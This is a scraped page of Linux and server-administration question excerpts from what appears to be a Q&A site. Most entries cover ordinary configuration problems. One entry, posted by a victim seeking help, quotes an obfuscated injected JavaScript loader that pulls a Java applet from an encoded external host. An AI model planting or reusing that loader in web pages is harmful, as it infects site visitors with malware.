Search Results

Search found 45752 results on 1831 pages for 'ubuntu linux'.

Page 679/1831 | < Previous Page | 675 676 677 678 679 680 681 682 683 684 685 686  | Next Page >

  • How to update-grub on a system running overlayroot?

    - by mikepurvis
    We ship boxes configured with overlayroot, using the following overlayroot.conf: overlayroot=device:dev=/dev/sda6,timeout=20,recurse=0 Which produces the following mount configuration: $ mount overlayroot on / type overlayfs (rw,errors=remount-ro) /dev/sda5 on /media/root-ro type ext3 (ro,relatime,errors=continue,user_xattr,acl,barrier=1,data=ordered) /dev/sda6 on /media/root-rw type ext3 (rw,relatime,errors=continue,user_xattr,acl,barrier=1,data=ordered) /dev/sda1 on /boot type ext3 (rw) As you can see, three key physical partitions: sda1 is /boot, sda5 is a read-only "factory" root, and sda6 is a "user" root which can be wiped at any point to restore the machine to its original factory state. Now, the problem arises when update-grub is run for any reason: $ sudo update-grub [sudo] password for administrator: /usr/sbin/grub-probe: error: cannot find a device for / (is /dev mounted?). Understandable, since / is an overlayfs. The contents of /usr/sbin/update-grub are: #!/bin/sh set -e exec grub-mkconfig -o /boot/grub/grub.cfg "$@" With /usr/sbin/grub-mkconfig being the business part of things. But the actual problem is in /usr/sbin/grub-probe, called by grub-mkconfig, and grub-probe is a binary. So my question is, is there a parameter or whatever which can make grub-probe do the right thing in the face of / being an overlayfs? And secondly, is there a way to hack/patch that in so that the update-grub script just does the right thing? Thanks.

    Read the article

  • Error headers: ap_headers_output_filter() after putting cache header in htaccess file

    - by Brad
    Receiving error: [debug] mod_headers.c(663): headers: ap_headers_output_filter() after I included this within the htaccess file: # 6 DAYS <FilesMatch "\.(ico|pdf|flv|jpg|jpeg|png|gif|js|css|swf)$"> Header set Cache-Control "max-age=518400, public" </FilesMatch> # 2 DAYS <FilesMatch "\.(xml|txt)$"> Header set Cache-Control "max-age=172800, public, must-revalidate" </FilesMatch> # 2 HOURS <FilesMatch "\.(html|htm)$"> Header set Cache-Control "max-age=7200, must-revalidate" </FilesMatch> Any help is appreciated as to what I could do to fix this?

    Read the article

  • mono 3.0.2 + xsp + lighttpd delivers empty page

    - by Nefal Warnets
    I needed MVC 4 (and basic .NET 4.5) support so I downloaded mono 3.0.2 and deployed it on an lighttpd 1.4.28 installation, together with xsp-2.10.2 (was the latest I could find). After going through the config tutorials I managed to get the fastcgi server to spawn, but all pages are served empty. even if I go to nonexistant urls or direct .aspx files I get an empty HTTP 200 response. The log file on Debug shows nothing suspicious. Here is the log: [2012-12-12 15:15:38Z] Debug Accepting an incoming connection. [2012-12-12 15:15:38Z] Debug Record received. (Type: BeginRequest, ID: 1, Length: 8) [2012-12-12 15:15:38Z] Debug Record received. (Type: Params, ID: 1, Length: 801) [2012-12-12 15:15:38Z] Debug Record received. (Type: Params, ID: 1, Length: 0) [2012-12-12 15:15:38Z] Debug Read parameter. (SERVER_SOFTWARE = lighttpd/1.4.28) [2012-12-12 15:15:38Z] Debug Read parameter. (SERVER_NAME = xxxx) [2012-12-12 15:15:38Z] Debug Read parameter. (GATEWAY_INTERFACE = CGI/1.1) [2012-12-12 15:15:38Z] Debug Read parameter. (SERVER_PORT = 80) [2012-12-12 15:15:38Z] Debug Read parameter. (SERVER_ADDR = xxxx) [2012-12-12 15:15:38Z] Debug Read parameter. (REMOTE_PORT = xxx) [2012-12-12 15:15:38Z] Debug Read parameter. (REMOTE_ADDR = xxxx) [2012-12-12 15:15:38Z] Debug Read parameter. (SCRIPT_NAME = /ViewPage1.aspx) [2012-12-12 15:15:38Z] Debug Read parameter. (PATH_INFO = ) [2012-12-12 15:15:38Z] Debug Read parameter. (SCRIPT_FILENAME = /data/htdocs/ViewPage1.aspx) [2012-12-12 15:15:38Z] Debug Read parameter. (DOCUMENT_ROOT = /data/htdocs) [2012-12-12 15:15:38Z] Debug Read parameter. (REQUEST_URI = /ViewPage1.aspx) [2012-12-12 15:15:38Z] Debug Read parameter. (QUERY_STRING = ) [2012-12-12 15:15:38Z] Debug Read parameter. (REQUEST_METHOD = GET) [2012-12-12 15:15:38Z] Debug Read parameter. (REDIRECT_STATUS = 200) [2012-12-12 15:15:38Z] Debug Read parameter. (SERVER_PROTOCOL = HTTP/1.1) [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_HOST = xxxxx) [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_CONNECTION = keep-alive) [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_CACHE_CONTROL = max-age=0) [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_USER_AGENT = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11) [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_ACCEPT = text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8) [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_ACCEPT_ENCODING = gzip,deflate,sdch) [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_ACCEPT_LANGUAGE = en-US,en;q=0.8) [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_ACCEPT_CHARSET = ISO-8859-1,utf-8;q=0.7,*;q=0.3) [2012-12-12 15:15:38Z] Debug Record received. (Type: StandardInput, ID: 1, Length: 0) [2012-12-12 15:15:38Z] Debug Record sent. (Type: EndRequest, ID: 1, Length: 8) lighttpd config: server.modules += ( "mod_fastcgi" ) include "conf.d/mono.conf" $HTTP["host"] !~ "^vdn\." { $HTTP["url"] !~ "\.(jpg|gif|png|js|css|swf|ico|jpeg|mp4|flv|zip|7z|rar|psd|pdf|html|htm)$" { fastcgi.server += ( "" => (( "socket" => mono_shared_dir + "fastcgi-mono-server", "bin-path" => mono_fastcgi_server, "bin-environment" => ( "PATH" => mono_dir + "bin:/bin:/usr/bin:", "LD_LIBRARY_PATH" => mono_dir + "lib:", "MONO_SHARED_DIR" => mono_shared_dir, "MONO_FCGI_LOGLEVELS" => "Debug", "MONO_FCGI_LOGFILE" => mono_shared_dir + "fastcgi.log", "MONO_FCGI_ROOT" => mono_fcgi_root, "MONO_FCGI_APPLICATIONS" => mono_fcgi_applications ), "max-procs" => 1, "check-local" => "disable" )) ) } } the referenced mono.conf index-file.names += ( "index.aspx", "default.aspx" ) var.mono_dir = "/usr/" var.mono_shared_dir = "/tmp/" var.mono_fastcgi_server = mono_dir + "bin/" + "fastcgi-mono-server4" var.mono_fcgi_root = server.document-root var.mono_fcgi_applications = "/:." The document root for this server is /data/htdocs. The asp.net files reside there. lighttpd error logs show nothing. Every help is greatly appreciated!

    Read the article

  • How to permanently add wireless interfaces with iw

    - by walli
    How can I permanently add virtual wireless interfaces to my network configuration with iw? I created the following interfaces: iw phy phy0 interface add vwlan0 type station iw phy phy0 interface add vwlan1 type __ap The first is configured as a wifi client connecting to an existing network (wpa_supplicant) The second is configured as wireless hotspot (hostapd + dnsmasq) The setup works, but now I can't quite figure out what the best strategy is to save this configuration permanently. Have made an init script for wpa_supplicant Have made an init script for the hotspot Virtual adaptor network settings set in /etc/network/interfaces But all this depends on the wireless interfaces being created. What would be the best way to make sure these interfaces are created before the network is set up and the services are run? As a bonus, since this wireless interface is a usb device, would it be possible to have the interfaces created (and the services started) when the interface is hotplugged? I know you can execute code after a network interface is up, but the wlan0 interface that is hotplugged should never be up. Operating system is raspbian

    Read the article

  • Weird scp behavior

    - by bryan1967
    I am trying to scp a file but it returns immediately with the DATE and not file is copied: [cosmo] Downloads > scp V17530-01_1of2.zip bryan@elphaba:Downloads bryan@elphaba's password: Sat Apr 10 13:35:41 PDT 2010 I have never seen this before. I have confirmed that I have the sshd running on the target system and that the firewall is allowing 22/tcp. Any help on what is going on would be very much appreciated. Thanks, Bryan

    Read the article

  • PXE Boot Fedora 17 Error

    - by DrifterDave
    When trying to boot into the latest Fedora 17 cd via PXE, I am presented with the following error: PXE dracut: fatal: no or empty root= argument So, I added a root= line to my fedora menu entry (shown below), but receive the following error: dracut Warning: Unable to process initqueue Any assistance would be greatly appreciated. Fedora.menu LABEL 1 MENU LABEL fedora 17 (32-bit) KERNEL fedora/17/i386/vmlinuz0 APPEND method=nfs:192.168.1.101:/srv/install/fedora/17/i386/ lang=us keymap=us ip=dhcp ksdevice=eth1 noipv6 root=/dev/ram0 initrd=fedora/17/i386/initrd0.img ramdisk_size=10000 TEXT HELP Install Fedora 17 (32-bit) ENDTEXT

    Read the article

  • Can't access Postfix TLS/SSL

    - by skerit
    I have set up my Postfix, with TLS/SSL, correctly. Every test on the machine itself (with telnet) runs fine. However, when I want to access the server from somewhere else, it fails. So port 587 and the rest is blocked for some reason, but I don't really know where.

    Read the article

  • Unable to run openoffice in headless mode

    - by uswaretech
    I want to automoate some PPT - PDF conversions, so I want to run openoffice in headless mode for scripting. On my machine with X running I can start opemoffice in headless mode via soffice -accept="socket,port=8100;urp;" -headless This doesn't seem to work on a server with X not running. $ soffice -accept="socket,port=8100;urp;" -headless /usr/lib/openoffice/program/soffice.bin X11 error: Can't open display: Set DISPLAY environment variable, use -display option or check permissions of your X-Server (See "man X" resp. "man xhost" for details) $ The error doesnt seem to make sense as well, as the point of specifying -headless was so that I do not need X, while this command seems to look for X.

    Read the article

  • Monit won't restart process

    - by bresc
    I just don't get it. monit behaves very strangely... check process thin with pidfile /var/run/thin.4567.pid start program = "/srv/Pusher/server start" stop program = "/srv/Pusher/server stop" if failed host 127.0.0.1 port 4567 protocol http then restart group server this is the process that should be restarted. So I tested monit and stopped the process. But it is showing only this: Process 'thin' status Does not exist monitoring status monitored data collected Wed Mar 24 01:18:55 2010 when I run "monit validate" it starts the service. Am I missing something? Thx

    Read the article

  • Binding Super+C Super+V to Copy and Paste

    - by solo
    For some time I've been interested in binding the Windows Key (Super_L) on my keyboard to Copy and Paste for no other reason but convenience and consistency between my desktop and my MacBook. I thought that I was close after reading about xmodmap and executing the following: $ # re-map Super_L to Mode_switch, the 3rd col in keymap table `xmodmap -pke` $ xmodmap -e "keycode 133 = Mode_switch" $ # map Mode_switch+c to copy $ xmodmap -e "keycode 54 = c C XF86_Copy C" $ # map Mode_switch+v to paste $ xmodmap -e "keycode 55 = v V XF86_Paste V" Unfortunately, XF86Copy and XF86Paste don't seem to work, at all. They are listed in /usr/include/X11/XF86keysym.h and xev shows that the key sequence is being interpreted by X as XF86Paste and XF86Copy, do these symbols actually work? Do they have to have application level support?

    Read the article

  • Malware Cross Site Scriptinig attack / XSS Attack?

    - by user124176
    I have been hit by an Cross Site Scripting / XSS / RFI Attack, where I cant find it anywhere in the source of the files and Hashes on files have not been changed according to OSSEC HIDS that I run real time monitoring on all webdirs. The Attack happens on IE9 Only it and appends java script code like beneath, notice that it starts after /html tag closes normally. : scXXpt language="javascXXpt"var enuwjo = function(gqumas, yhxxju, zbkpilf, xzzvhld){var xew = function(iso) {var crh, eaq, i; var owb=""; crh = iso.length; for (i = 0; i < crh; ++i) {eaq = iso.charCodeAt(i)-2;owb = owb + String.fromCharCode(eaq);} return(owb); } var janlq=document.createElement(xew("crrngv"));janlq.setAttribute(xew("eqfg"), xew(gqumas));janlq.setAttribute(xew("ctejkxg"), xew("jvvr<11"+yhxxju));janlq.setAttribute(xew("ykfvj"), "1");janlq.setAttribute(xew("jgkijv"), "1");var lgtwyi=document.createElement(xew("rctco"));lgtwyi.setAttribute(xew("pcog"),xew(zbkpilf));lgtwyi.setAttribute(xew("xcnwg"),xew(xzzvhld));janlq.appendChild(lgtwyi);document.body.appendChild(janlq); } ; enuwjo("vxfgwtogg0dcrcmnwe0encuu","g{g0o{yge{0kp129;5","mlit{ttmdttponfhrrexihpe","fh;ccfe:85:5d9872;2;f569276h5268ff9;34:25;7d:8:7h8c68777;;822c73"); No code has been changed on file as far as my HIDS says ... but I can see in my Error log, the following... File does not exist: /var/www/vhosts/superkids.dk/ggtest/tvdeurmee In the Access log, the following IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc.class HTTP/1.1" 404 504 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc/class.class HTTP/1.1" 404 509 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" Now... the folder or path /tvdeurmee/bapakluc/ does not exist on the server in question, nor does the Java Class class.class, yet it still looks like an local call to the server and it was getting an "404 File not found / 504 Gateway Timeout" (attack was blocked by local machine, hence the timeout / not found) Any idea on how to prevent the attack ? Im working on using HTML Purifier, but that might not be the correct idea it seems, according to some replies im getting on their forum :) Kind regards, Steven

    Read the article

  • possible SYN flooding on port 80. Sending cookies

    - by Sparsh Gupta
    I recently had a server downtime. I looked everywhere and the only thing I found in my log files is: Feb 17 18:58:04 localhost kernel: possible SYN flooding on port 80. Sending cookies. Feb 17 18:59:33 localhost kernel: possible SYN flooding on port 80. Sending cookies. Can someone give me more information about it. WHat is it, How can I debug the cause and how can I fix the same. I also posted ipconntrack suddenly became toooo large which has another data point I found unusual, wondering if the two things is connected as they occured exactly at the same time but at different servers. One at reverse proxy and other at actual backend Varnish server) Thanks

    Read the article

  • SSL certificates work fine from command line but fails in script

    - by jrallison
    I'm trying to setup email notifications for my continuous integration server. I have a script which uses nail to send the email when the build works: #!/bin/bash echo "Build Worked!" | nail -A myisp -s 'Build Success' [email protected] When I run this from the command line with sh build-worked, it works and I receive the email. However, when I start the continuous integration server which executes the same script, I get the following error: nail: /opt/bitnami/common/lib/libssl.so.0.9.8: no version information available (required by nail) nail: /opt/bitnami/common/lib/libcrypto.so.0.9.8: no version information available (required by nail) Error with certificate at depth: 0 issuer = /C=ZA/ST=Western Cape/L=Cape Town/O=Thawte Consulting cc/OU=Certification Services Division/CN=Thawte Premium Server CA/[email protected] subject = /C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com err 20: unable to get local issuer certificate Continue (y/n)? could not initiate SSL/TLS connection: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed . . . message not sent. I must be messing some configuration, any ideas?

    Read the article

  • Why doesn't pppd over ssh work here? Why can't I kill pppd?

    - by Peter V. Mørch
    I'm trying to setup a simple ppp tunnel over ssh. It works on several machines just fine. But on one machine, pppd gets "stuck": > pgrep pppd | xargs ps up USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 4178 0.0 0.1 3020 1088 pts/1 Ds+ 05:28 0:00 /usr/sbin/pppd Any attempt to kill it (even sudo kill -9 4178) has no effect that I can see. strace -p 4178 also hangs similarly. After it has been started for a while, I start getting messages in dmesg like shown below. It is started like so from another machine: ssh -t root@server /usr/sbin/pppd passive noauth When I do this to one of the machines that work, the remote end's pppd spits out garbage/binary data to the console (as expected). When I do it to the one that fails, I get no output from pppd, but the ssh session eventually times out. If I instead ssh to the machine, and then run /usr/sbin/pppd passive noauth in a separate step I also get the expected binary output. I now have a couple of questions: What could be up with the one machine where pppd fails? I don't even know where to start looking... What could be the difference between ssh -t root@server /usr/sbin/pppd passive noauth in a single step and ssh root@server and /usr/sbin/pppd passive noauth in two steps? How can it be that I can't kill the process even with sudo kill -9? The only way I know is to reboot. (I've tried searching for something similar but didn't get anywhere so I'm sorry I don't have any more leads) Any ideas? The problem machine runs in debian on VMware "hardware" (as do the ones that work) and it exhibits the problem when cloned and on both debian lenny (original) and squeeze (after upgrade) dmesg entries: [ 1198.727248] INFO: task pppd:4178 blocked for more than 120 seconds. [ 1198.727507] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1198.727904] pppd D ece2dc9c 0 4178 4174 0x00000004 [ 1198.727908] 00000098 00000082 f2503520 ece2dc9c 0000b1e7 00000000 c148d1c0 c148d1c0 [ 1198.727913] f2a06100 f6e071c0 00000000 ece2dc18 f5cd07e0 00000000 ece2d400 ece2dc9d [ 1198.727918] 00c52300 ece2dcbc f67bfef8 ec98e480 f291cec0 00000000 c10cf5b0 c10dfd21 [ 1198.727923] Call Trace: [ 1198.727926] [<c10cf5b0>] ? nameidata_to_filp+0x37/0x41 [ 1198.727929] [<c10dfd21>] ? dput+0x21/0xb7 [ 1198.727932] [<c11cfecc>] ? tty_ldisc_ref_wait+0x5f/0x76 [ 1198.727935] [<c104de7a>] ? wake_up_bit+0x5c/0x5c [ 1198.727938] [<c11cb91b>] ? tty_ioctl+0x85f/0x8ba [ 1198.727941] [<c10fec18>] ? do_lock_file_wait+0x3d/0xd9 [ 1198.727944] [<c1162c97>] ? _copy_from_user+0x2b/0x102 [ 1198.727946] [<c11cb0bc>] ? tty_check_change+0xb9/0xb9 [ 1198.727949] [<c10dbeb7>] ? do_vfs_ioctl+0x485/0x4c7 [ 1198.727952] [<c10db59a>] ? do_fcntl+0x24f/0x3a2 [ 1198.727954] [<c10dbf3a>] ? sys_ioctl+0x41/0x58 [ 1198.727957] [<c12c6a1f>] ? sysenter_do_call+0x12/0x28 [ 1318.457225] INFO: task sshd:4174 blocked for more than 120 seconds. [ 1318.457500] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1318.457896] sshd D f25024cc 0 4174 2393 0x00000000 [ 1318.457901] 00000098 00000086 f2a06940 f25024cc 0000b246 00000000 c148d1c0 c148d1c0 [ 1318.457906] f2503520 f6e071c0 00000000 3f056585 0000000f ece2d4bc 3f056585 f2503520 [ 1318.457911] ec98bb38 ec98bbdc 00000000 00000000 00000000 c12c09b5 f2503520 c10327cb [ 1318.457916] Call Trace: [ 1318.457926] [<c12c09b5>] ? schedule_hrtimeout_range_clock+0x3c/0xd9 [ 1318.457931] [<c10327cb>] ? try_to_wake_up+0x13f/0x13f [ 1318.457935] [<c11cfecc>] ? tty_ldisc_ref_wait+0x5f/0x76 [ 1318.457940] [<c104de7a>] ? wake_up_bit+0x5c/0x5c [ 1318.457943] [<c11c9ad3>] ? tty_poll+0x32/0x5e [ 1318.457947] [<c10dd4d5>] ? do_select+0x2a1/0x42e [ 1318.457950] [<c10dcb83>] ? poll_freewait+0x69/0x69 [ 1318.457953] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457955] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457958] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457960] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457963] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457965] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457968] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457971] [<c10429c2>] ? lock_timer_base+0x19/0x35 [ 1318.457974] [<c1042eb5>] ? __mod_timer+0x10c/0x116 [ 1318.457977] [<c1042f89>] ? mod_timer+0x69/0x6e [ 1318.457981] [<c121325d>] ? sk_reset_timer+0xc/0x16 [ 1318.457984] [<c1252f57>] ? tcp_event_new_data_sent+0x66/0x6b [ 1318.457987] [<c1255b85>] ? tcp_write_xmit+0x7a7/0x86a [ 1318.457990] [<c121760d>] ? __alloc_skb+0x50/0xfd [ 1318.457994] [<c12c12bc>] ? _raw_spin_lock_bh+0x8/0x1e [ 1318.457996] [<c1212e98>] ? release_sock+0x10/0xc4 [ 1318.457999] [<c124b543>] ? tcp_sendmsg+0x6dd/0x7b7 [ 1318.458003] [<c1162c97>] ? _copy_from_user+0x2b/0x102 [ 1318.458006] [<c10dd7a0>] ? core_sys_select+0x13e/0x1c3 [ 1318.458009] [<c12102a3>] ? sock_aio_write+0xc0/0xd4 [ 1318.458012] [<c10d0655>] ? do_sync_write+0xa0/0xe4 [ 1318.458016] [<c10b141c>] ? handle_mm_fault+0x222/0x238 [ 1318.458019] [<c10f6096>] ? fsnotify+0x1de/0x1f9 [ 1318.458022] [<c10dd9e8>] ? sys_select+0x6e/0x8f [ 1318.458024] [<c10d105e>] ? sys_write+0x3c/0x63 [ 1318.458028] [<c12c6a1f>] ? sysenter_do_call+0x12/0x28

    Read the article

  • KVM slow guest i/o

    - by Akarot
    Host: Debian 6.0 (squeeze) with qemu-kvm and libvirt from squeeze-backports ii qemu-kvm 1.0+dfsg-8~bpo60+1 ii libvirt-bin 0.9.8-2~bpo60+2 Has 3TB sata drives with software raid and lvm. It has a sequential write speed of ~140MB/s measured with dd bs=1M count=512 if=/dev/zero of=test conv=fdatasync Elevator set to cfq Guest Debian 6.0 (squeeze) Uses LVM as storage. Drivers are virtio and cache='none' Sequential write speed is considerably slower with only 25-50MB/s Elevator set to noop I'm kind of running out of ideas for further tweaks but I'm sure that I/O speed should be much faster because many people are reporting almost native performance with lvm.

    Read the article

  • How can I use VirtualDocumentRoot to serve the www subdomain with SSL enabled?

    - by mdgreenwald
    I am able to serve http://www.domain.com and http://domain.com. Also https://domain.com works fine too. But not https://www.domain.com for some reason this doesn't work. I even created a www.domain.com in my sites-availible folder and also enabled it. I reloaded the configuration and yet it still doesn't work. I have a wildcard certificate so that is NOT the problem. <IfModule mod_ssl.c> <VirtualHost *:443> ServerAdmin [email protected] ServerName *.domain.com:443 ServerAlias www.domain.com VirtualDocumentRoot /var/www/%0 Thanks for any help.

    Read the article

  • Debian and Multipath IO problem

    - by tearman
    Basically the situation is, I have a box running Debian, the box internally has an Intel SCSI RAID controller which is controlling 2 hard drives in RAID1 mode which is where the OS is installed. Further, I have a QLogic fiber channel adapter that connects the unit to a Fiber Channel SAN. My process of installation is I'll install Debian to the local drives, and leave the QLogic firmware out of it for the time being. Then once I get the unit online, I'll install the firmware drivers. This flops my internal drives from /dev/sda to /dev/sdc, which is a bit annoying, but recoverable. Probably should address these by UUID anyways. Once I get back online, I have to install multipath-tools (the framework is a multipath framework). However, once I reboot the machine again, it fails on boot after discovering multipath targets, saying my local drives are busy and cannot be mounted to /root. Any help in what may be the problem here? Or at least how to disable multipath until after the unit boots and then ignores the internal drives?

    Read the article

  • How to get 32 bit version of libraries on Ubuntu 64 bit?

    - by Olivier Lalonde
    I'm trying to compile a program which uses Google's V8 library (which is 32 bit). Therefore any library I use within my program also has to be 32 bit. Where can I download the 32 bit version of libraries on Ubuntu 64 bit? More specifically, I'm looking for the libnotify 32 bit version. This is the errors I am getting right now: g++ -o shell -m32 shell.o -L../v8 -lv8 -lpthread `pkg-config --libs libnotify glib-2.0` /usr/bin/ld: skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../libnotify.so when searching for -lnotify /usr/bin/ld: skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../libnotify.a when searching for -lnotify /usr/bin/ld: skipping incompatible /usr/lib/libnotify.so when searching for -lnotify /usr/bin/ld: skipping incompatible /usr/lib/libnotify.a when searching for -lnotify /usr/bin/ld: cannot find -lnotify collect2: ld returned 1 exit status Thanks!

    Read the article

  • Configure APE-Server on Ubuntu10.10 webserver

    - by sadmicrowave
    I'm having problems configuring my ape-server. First, I reside behind a corporate firewall where our own DNS servers are maintained. I requested a domain name for my server and was provided uslonsweb003.us.mycompany.com from my IT group. Therefore, my website works and can be accessed via (intranet only) at http://uslonsweb003.us.mycompany.com/test.php. I followed the instructions at ape-project.org and run the Check Tool at the end only to find I get an error stating: Running test : Contacting APE Server (adding frequency) Can't contact APE Server. Please check the folowing url is pointing to your APE server : http://0.uslonsweb003.us.mycompany.com:6969 my /etc/apache2/apache2.conf module looks as follows: <VirtualHost *:80> Servername uslonsweb003.us.mycompany.com ServerAlias ape.uslonsweb003.us.mycompany.com ServerAlias *.ape.uslonsweb003.us.mycompany.com DocumentRoot "/var/www/" </VirtualHost> my /var/www/ape-jsf/Demos/config.js config section looks as follows: APE.Config.baseUrl = 'http://uslonsweb003.us.mycompany.com/ape-jsf'; APE.Config.domain = 'uslonsweb003.us.mycompany.com'; APE.Config.server = 'uslonsweb003.us.mycompany.com:6969'; The instructions at ape-project.org tell me that the APE.Config.server should be `ape.mydomain.com:6969'; but that does not work (I'm assuming because my corporate DNS does not understand the 'ape' before the domain name since 'ape' was not registered with the IT DNS). So therefore, I changed it to what you see above. Please help!! Thanks in advance UPDATE 1 per the installation instructions located on this page http://www.ape-project.org/wiki/index.php/Advanced_APE_configuration under 'Configure your Server/Computer' (I'm running it on a server obviously) It says I need to add some lines to my DNS config file. It sounds like (since I'm within a corporate network) I would ask my IT group to add the following lines to the DNS configuration file on their end: ape IN A x.x.x.x ; IP address of my APE server *.ape IN CNAME ape I just want to make sure this is all I have to have them add (or if this is even correct) before I ask them.

    Read the article

  • XAMPP with PostgreSQL

    - by fred smith
    I'm looking for a package like XAMPP, but instead of MySQL it would use PostgreSQL. I've done some searching and haven't turned up anything other than doing a full server setup of both.

    Read the article

  • nginx with stub_status.. need help with nginx.conf

    - by Amar
    Hello I am trying to setup nginx with stub status so I can monitor nginx requests etc.. with serverdensity.com. I needed to put something like this in nginx.conf server { listen 82.113.147.xxx; location /nginx_status { stub_status on; access_log off; allow 82.113.147.xxx; deny all; } } And with this monitoring acctualy works. However It seems I lost "include" part in my nginx.conf and now none of vhosts in sites-enabled work. Here is a bit more of my nginx.conf http { include /etc/nginx/mime.types; default_type application/octet-stream; server_tokens off; access_log /var/log/nginx/access.log; sendfile on; #tcp_nopush on; #keepalive_timeout 0; keepalive_timeout 65; tcp_nodelay on; gzip on; gzip_comp_level 2; gzip_proxied any; gzip_types text/plain text/css application/x-javascript text/xml application/xml application/xml+rss text/javascript; include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; server { listen 82.113.147.226; location /nginx_status { stub_status on; access_log off; allow 82.113.147.226; deny all; } } } Hope someone can help me with this , as I belive its minor issue, its just that "I dont see it" ty

    Read the article

  • amanda backup problem

    - by hossam alkhalili
    hello, i installed amanda on centos 5.5 to backup windows 7 and windows server 2008 over network and i used 15 minutes instillation guide but when i type amcheck DailySet1 i got request failed then if i type amservice when i amandabackup account to define the problem i got Permission denied and on root account i got OPTIONS features=ff7fffff9cfeffffd3cf1300; i use zwc on windows 7 as an agent can anyone help me thanks -sh-3.2$ amcheck DailySet1 Amanda Tape Server Host Check Holding disk /dumps/amanda: 1791315968 KB disk space available, using 1791213568 KB slot 1: volume 'DailySet1-01' Will write to volume 'DailySet1-01' in slot 1. NOTE: skipping tape-writable test NOTE: conf info dir /etc/amanda/DailySet1/curinfo does not exist NOTE: it will be created on the next run. NOTE: index dir /etc/amanda/DailySet1/index does not exist NOTE: it will be created on the next run. Server check took 0.880 seconds Amanda Backup Client Hosts Check WARNING: jrcbs01.jrc.local: selfcheck request failed: Connection refused Client check: 1 host checked in 10.020 seconds. 1 problem found. amservice 192.168.1.1 bsdtcp noop [root@jrcbs01 ~]# amservice 192.168.1.5 bsdtcp noop

    Read the article

  • cset as non-root to set cpu affinity for running processes

    - by RaveTheTadpole
    I've been playing with cset to set cpu affinity for running processes. I'm recreating the built-in "shield" function manually with set and proc, to add some subsets for specific threads of my application. I have a bash script that is calling cset to create the sets, and move the correct threads to the correct sets. It works when run with sudo. Now I'd like to make this script executable by another user, who does not have sudo powers. I trust this user enough to be responsible with cset, but don't want to open up the wide powers of root. I thought that CAP_SYS_NICE -- which is needed for sched_setaffinity, which I just assume cset must use -- on the script would be sufficient, but that didn't work. I tried extending CAP_SYS_NICE to the cset program (which is a thin python wrapper for the cset python library). No dice. The output of cap_to_text on my CAP_SYS_NICE'd scripts is "=cap_ipc_lock,cap_sys_nice,cap_sys_resource+eip" (it has ipc_lock and sys_resource for other reasons; I think only sys_nice is relevant). Any ideas?

    Read the article

  • OpenWrt logging: how to find out "wifi deauthentication"

    - by user62367
    If someone starts to use the wifi, i can see that with logread: Jan 23 21:04:47 router daemon.info hostapd: wlan0: STA XX:XX:XX:XX:XX:XX IEEE 802.11: authenticated But how can i see, that he/she's disconnecting? Theres no "bla-bla deauthenticated bla" line in logread, or even a thing that points to that someone get's disconnected.. I tried to google: http://wiki.openwrt.org/doc/uci/system But it doesn't writes about loglevel. Can anyone help me find out, how to find out that someone disconnects it's wifi from the router? The logread doesn't even writes a line when someone disconnects. Please help!! It's important! Thank you!:\

    Read the article

< Previous Page | 675 676 677 678 679 680 681 682 683 684 685 686  | Next Page >